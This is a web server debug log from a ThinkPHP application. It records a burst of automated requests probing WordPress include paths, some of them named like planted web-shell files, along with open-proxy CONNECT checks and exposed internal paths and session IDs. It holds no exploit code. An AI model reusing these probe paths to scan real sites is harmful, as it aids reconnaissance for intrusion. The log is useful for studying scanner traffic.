CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001093s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'uploads', 2 => '2025', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '223.169.90.182', 'x-real-ip' => '223.169.90.182', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:26+08:00 ] 53.39.81.115 GET /wp-includes/IXR [ info ] clcoa.com/wp-includes/IXR [运行时间:0.018443s][吞吐率:54.22req/s] [内存消耗:2,208.76kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001095s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'IXR', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '53.39.81.115', 'x-real-ip' => '53.39.81.115', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:26+08:00 ] 13.194.150.149 GET /wp-includes/IXR/index.php [ info ] clcoa.com/wp-includes/IXR/index.php [运行时间:0.018439s][吞吐率:54.23req/s] [内存消耗:2,208.74kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001095s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'IXR', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '13.194.150.149', 'x-real-ip' => '13.194.150.149', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:26+08:00 ] 192.37.94.10 GET /wp-includes/SimplePie/index.php [ info ] clcoa.com/wp-includes/SimplePie/index.php [运行时间:0.019360s][吞吐率:51.65req/s] [内存消耗:2,208.48kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001133s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'SimplePie', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '192.37.94.10', 'x-real-ip' => '192.37.94.10', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:26+08:00 ] 234.57.103.76 GET /wp-includes/Text [ info ] clcoa.com/wp-includes/Text [运行时间:0.020899s][吞吐率:47.85req/s] [内存消耗:2,208.91kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001103s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'Text', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '234.57.103.76', 'x-real-ip' => '234.57.103.76', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:26+08:00 ] 202.182.196.32 GET /wp-includes/Text/Diff/Engine [ info ] clcoa.com/wp-includes/Text/Diff/Engine [运行时间:0.019311s][吞吐率:51.78req/s] [内存消耗:2,208.65kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001122s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'Text', 2 => 'Diff', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '202.182.196.32', 'x-real-ip' => '202.182.196.32', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:27+08:00 ] 165.210.54.190 GET /wp-includes/block-bindings/index.php [ info ] clcoa.com/wp-includes/block-bindings/index.php [运行时间:0.019834s][吞吐率:50.42req/s] [内存消耗:2,208.46kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001215s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'block-bindings', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.yahoo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '165.210.54.190', 'x-real-ip' => '165.210.54.190', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:27+08:00 ] 69.83.76.97 GET /wp-includes/block-supports [ info ] clcoa.com/wp-includes/block-supports [运行时间:0.018157s][吞吐率:55.08req/s] [内存消耗:2,208.74kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001077s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'block-supports', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '69.83.76.97', 'x-real-ip' => '69.83.76.97', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:27+08:00 ] 178.19.161.103 GET /wp-includes/blocks/code [ info ] clcoa.com/wp-includes/blocks/code [运行时间:0.019226s][吞吐率:52.01req/s] [内存消耗:2,208.80kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001111s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'blocks', 2 => 'code', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '178.19.161.103', 'x-real-ip' => '178.19.161.103', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:27+08:00 ] 33.203.109.85 GET /wp-includes/customize/chosen.php [ info ] clcoa.com/wp-includes/customize/chosen.php [运行时间:0.020402s][吞吐率:49.01req/s] [内存消耗:2,208.51kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001179s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'customize', 2 => 'chosen.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '33.203.109.85', 'x-real-ip' => '33.203.109.85', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:27+08:00 ] 223.247.20.221 GET /wp-includes/html-api/index.php [ info ] clcoa.com/wp-includes/html-api/index.php [运行时间:0.020029s][吞吐率:49.93req/s] [内存消耗:2,208.72kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001218s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'html-api', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '223.247.20.221', 'x-real-ip' => '223.247.20.221', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:28+08:00 ] 59.27.25.165 GET /wp-includes/index.php [ info ] clcoa.com/wp-includes/index.php [运行时间:0.018381s][吞吐率:54.40req/s] [内存消耗:2,208.85kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001190s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'index.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '59.27.25.165', 'x-real-ip' => '59.27.25.165', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:28+08:00 ] 167.251.115.161 GET /wp-includes/js/dist/development/index.php [ info ] clcoa.com/wp-includes/js/dist/development/index.php [运行时间:0.019908s][吞吐率:50.23req/s] [内存消耗:2,209.36kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001251s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'js', 2 => 'dist', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '167.251.115.161', 'x-real-ip' => '167.251.115.161', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( 'development' => 'index.php', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:28+08:00 ] 239.247.126.167 GET /wp-includes/pomo/index.php [ info ] clcoa.com/wp-includes/pomo/index.php [运行时间:0.020205s][吞吐率:49.49req/s] [内存消耗:2,208.73kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001152s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'pomo', 2 => 'index.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '239.247.126.167', 'x-real-ip' => '239.247.126.167', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:28+08:00 ] 189.38.77.168 GET /wp-includes/rest-api [ info ] clcoa.com/wp-includes/rest-api [运行时间:0.020448s][吞吐率:48.90req/s] [内存消耗:2,208.91kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001203s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'rest-api', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '189.38.77.168', 'x-real-ip' => '189.38.77.168', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:28+08:00 ] 247.104.187.15 GET /wp-includes/sitemaps/autoload_classmap.php [ info ] clcoa.com/wp-includes/sitemaps/autoload_classmap.php [运行时间:0.019411s][吞吐率:51.52req/s] [内存消耗:2,208.88kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001169s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'sitemaps', 2 => 'autoload_classmap.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '247.104.187.15', 'x-real-ip' => '247.104.187.15', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:29+08:00 ] 174.143.129.71 GET /wp-includes/theme-compat [ info ] clcoa.com/wp-includes/theme-compat [运行时间:0.018413s][吞吐率:54.31req/s] [内存消耗:2,208.67kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001080s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'theme-compat', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://duckduckgo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '174.143.129.71', 'x-real-ip' => '174.143.129.71', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:52:05+08:00 ] 204.76.203.8 GET / [ info ] 47.105.33.115:80/ [运行时间:0.030915s][吞吐率:32.35req/s] [内存消耗:3,332.04kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001332s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001685s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:03:20+08:00 ] 38.58.179.181 GET http://check.9tb.org/ [ info ] check.9tb.orghttp://check.9tb.org/ [运行时间:0.030039s][吞吐率:33.29req/s] [内存消耗:3,333.26kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001335s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'check.9tb.org', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001628s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000110s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:21:08+08:00 ] 94.26.106.58 CONNECT www.google.com:443 [ info ] www.google.com:443www.google.com:443 [运行时间:0.029912s][吞吐率:33.43req/s] [内存消耗:3,330.48kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001134s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.google.com:443', 'user-agent' => 'Go-http-client/1.1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001481s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:21:08+08:00 ] 94.26.106.58 CONNECT www.cloudflare.com:443 [ info ] www.cloudflare.com:443www.cloudflare.com:443 [运行时间:0.029060s][吞吐率:34.41req/s] [内存消耗:3,330.38kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001350s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.cloudflare.com:443', 'user-agent' => 'Go-http-client/1.1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001689s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000094s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:31:24+08:00 ] 49.51.233.46 GET / [ info ] 47.105.33.115/ [运行时间:0.028954s][吞吐率:34.54req/s] [内存消耗:3,335.36kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'cache-control' => 'no-cache', 'connection' => 'keep-alive, close', 'pragma' => 'no-cache', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001579s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:45:02+08:00 ] 198.235.24.9 GET /.well-known/security.txt [ info ] 47.105.33.115:8081/.well-known/security.txt [运行时间:0.018623s][吞吐率:53.70req/s] [内存消耗:2,225.69kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] 